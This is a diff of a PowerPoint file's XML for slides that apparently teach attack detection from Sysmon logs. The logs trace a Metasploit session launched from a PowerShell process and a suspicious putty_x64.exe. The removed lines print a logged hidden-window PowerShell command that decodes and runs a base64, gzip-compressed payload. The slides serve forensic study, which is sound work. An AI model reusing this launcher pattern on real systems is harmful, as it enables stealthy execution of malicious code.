-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>conhost.exe 0xffffffff -ForceV1</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>CurrentDirectory</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>: C:\WINDOWS</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>User: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>PC2\user</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>IntegrityLevel</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>: High</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>Hashes: SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>ParentImage</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>ParentCommandLine</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>: ""</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: 2019-03-26 21:14:43.489</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>ProcessGuid</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: {9CA6D9DA-9643-5C9A-0000-001029551801}</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>ProcessId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: 5620</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
               <a:t>powershell.exe</a:t>
             </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>"" -noni -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>nop</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t> -w </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>hidden</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t> -c &amp;([</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>scriptblock</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>]::create((New-Object </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>IO.StreamReader</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>(New-Object </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>IO.Compression.GzipStream</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>((New-Object </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>IO.MemoryStream</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>(,[Convert]::FromBase64String('H4sIAFuWmlwCA7VW/W+iSBj+uU36P5CNiZBaRWu7vSabHCAornRlUbR65kJhhFkHcGGo4t7+7/eOQLebbe92LzlCwny8n8/7zLyss8ilOI44/5r7cnZ6MnYSJ+T42mZ+3eBqIRZOTmC1Fut2yr3j+KW03fbi0MHR6vZWyZIERbSYN/uISmmKwgeCUcoL3F/cLEAJuvjw8Am5lPvC1f5s9kn84JBSLFccN0DchRR5bG8Uuw6LpGltCaZ8/+VTc79RPrZ2Kh7tN+/aUbV0e7uAIOHA7m6aIxT5NGiI+0tRhN4i7rsi5PjzaSnxNufBUIN1pgKWwjA5GhbY+a2lgTf/P8Eq74wAPt6/gvVt7R92fwpAsVEm/MP69wu/BOgvpj5zMAU5C649gorW+woCJTOe/Z2wskDl1+XDfi8/ZPTiDn5azk7/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>BrreYUTFCgAA</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>'))),[</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>IO.Compression.CompressionMode</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>]::Decompress))).</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>ReadToEnd</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>()))";"1";"5";;"4";"1";"0";"-9223372036854775808";"589779";"Microsoft-Windows-Sysmon";"5770385f-c22a-43e0-bf4c-06f5698ffbd9";"Microsoft-Windows-Sysmon/Operational";"2236";"2264";"PC2";"S-1-5-18";"26.03.2019 22:14:44";;;"Microsoft-Windows-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>TargetFilename</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
+              <a:t>GPTP47LXLWQ9XHJFBNUM.temp</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>CreationUtcTime</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: 2019-02-18 07:25:45.895</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>PreviousCreationUtcTime</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: 2019-03-26 21:14:43.489";"2";"4";;"4";"2";"0";"-9223372036854775808";"589777";"Microsoft-Windows-Sysmon";"5770385f-c22a-43e0-bf4c-06f5698ffbd9";"Microsoft-Windows-Sysmon/Operational";"2236";"2264";"PC2";"S-1-5-18";"26.03.2019 22:14:43";;;"Microsoft-Windows-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
               <a:t>Sysmon</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>/Operational";"System.UInt32[]";"System.Diagnostics.Eventing.Reader.EventBookmark";"Information";"Info";"Process Create (rule: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>ProcessCreate</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>/Operational";"System.UInt32[]";"System.Diagnostics.Eventing.Reader.EventBookmark";"Information";"Info";"File creation time changed (rule: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>FileCreateTime</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
               <a:t>)";"System.Collections.ObjectModel.ReadOnlyCollection`1[</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
               <a:t>System.String</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
               <a:t>]";"System.Collections.Generic.List`1[</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
               <a:t>System.Diagnostics.Eventing.Reader.EventProperty</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
               <a:t>]"</a:t>
             </a:r>
           </a:p>
@@ -6757,7 +6424,7 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="0" y="142301"/>
+            <a:off x="64008" y="201169"/>
             <a:ext cx="12192000" cy="585926"/>
           </a:xfrm>
         </p:spPr>
@@ -6769,7 +6436,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" sz="5400" dirty="0"/>
-              <a:t>POWERSHELL PROCESS</a:t>
+              <a:t>METASPLOIT PROCESS</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6777,7 +6444,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="704521522"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3419150997"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -6818,8 +6485,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1498473" y="1736229"/>
-            <a:ext cx="10515600" cy="3385542"/>
+            <a:off x="1516761" y="1834651"/>
+            <a:ext cx="10515600" cy="3600986"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6833,91 +6500,111 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>"File creation time changed:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
+              <a:t>"</a:t>
+            </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>RuleName</a:t>
+              <a:t>CurrentDirectory</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: </a:t>
+              <a:t>: C:\WINDOWS\system32\</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>User: PC2\user</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>UtcTime</a:t>
+              <a:t>LogonGuid</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: 2019-03-26 21:14:43.489</a:t>
+              <a:t>: {9CA6D9DA-818F-5C9A-0000-002032380300}</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>ProcessGuid</a:t>
+              <a:t>LogonId</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: {9CA6D9DA-9643-5C9A-0000-001029551801}</a:t>
+              <a:t>: 0x33832</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>ProcessId</a:t>
+              <a:t>TerminalSessionId</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: 5620</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
+              <a:t>: 1</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>IntegrityLevel</a:t>
+            </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
-              <a:t>powershell.exe</a:t>
+              <a:t>: High</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>Hashes: SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>TargetFilename</a:t>
+              <a:t>ParentProcessGuid</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
-              <a:t>GPTP47LXLWQ9XHJFBNUM.temp</a:t>
+              <a:t>: {9CA6D9DA-9495-5C9A-0000-00108C710901}</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>CreationUtcTime</a:t>
+              <a:t>ParentProcessId</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: 2019-02-18 07:25:45.895</a:t>
+              <a:t>: 7660</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>PreviousCreationUtcTime</a:t>
+              <a:t>ParentImage</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: 2019-03-26 21:14:43.489";"2";"4";;"4";"2";"0";"-9223372036854775808";"589777";"Microsoft-Windows-Sysmon";"5770385f-c22a-43e0-bf4c-06f5698ffbd9";"Microsoft-Windows-Sysmon/Operational";"2236";"2264";"PC2";"S-1-5-18";"26.03.2019 22:14:43";;;"Microsoft-Windows-</a:t>
+              <a:t>: C:\Users\user\Desktop\</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0"/>
+              <a:t>putty_x64.exe</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>ParentCommandLine</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: ""C:\Users\user\Desktop\putty_x64.exe"" ";"1";"5";;"4";"1";"0";"-9223372036854775808";"589771";"Microsoft-Windows-Sysmon";"5770385f-c22a-43e0-bf4c-06f5698ffbd9";"Microsoft-Windows-Sysmon/Operational";"2236";"2264";"PC2";"S-1-5-18";"26.03.2019 22:14:42";;;"Microsoft-Windows-</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
@@ -6925,11 +6612,11 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>/Operational";"System.UInt32[]";"System.Diagnostics.Eventing.Reader.EventBookmark";"Information";"Info";"File creation time changed (rule: </a:t>
+              <a:t>/Operational";"System.UInt32[]";"System.Diagnostics.Eventing.Reader.EventBookmark";"Information";"Info";"Process Create (rule: </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>FileCreateTime</a:t>
+              <a:t>ProcessCreate</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0"/>
@@ -6972,241 +6659,6 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="64008" y="201169"/>
-            <a:ext cx="12192000" cy="585926"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr>
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="5400" dirty="0"/>
-              <a:t>METASPLOIT PROCESS</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3419150997"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
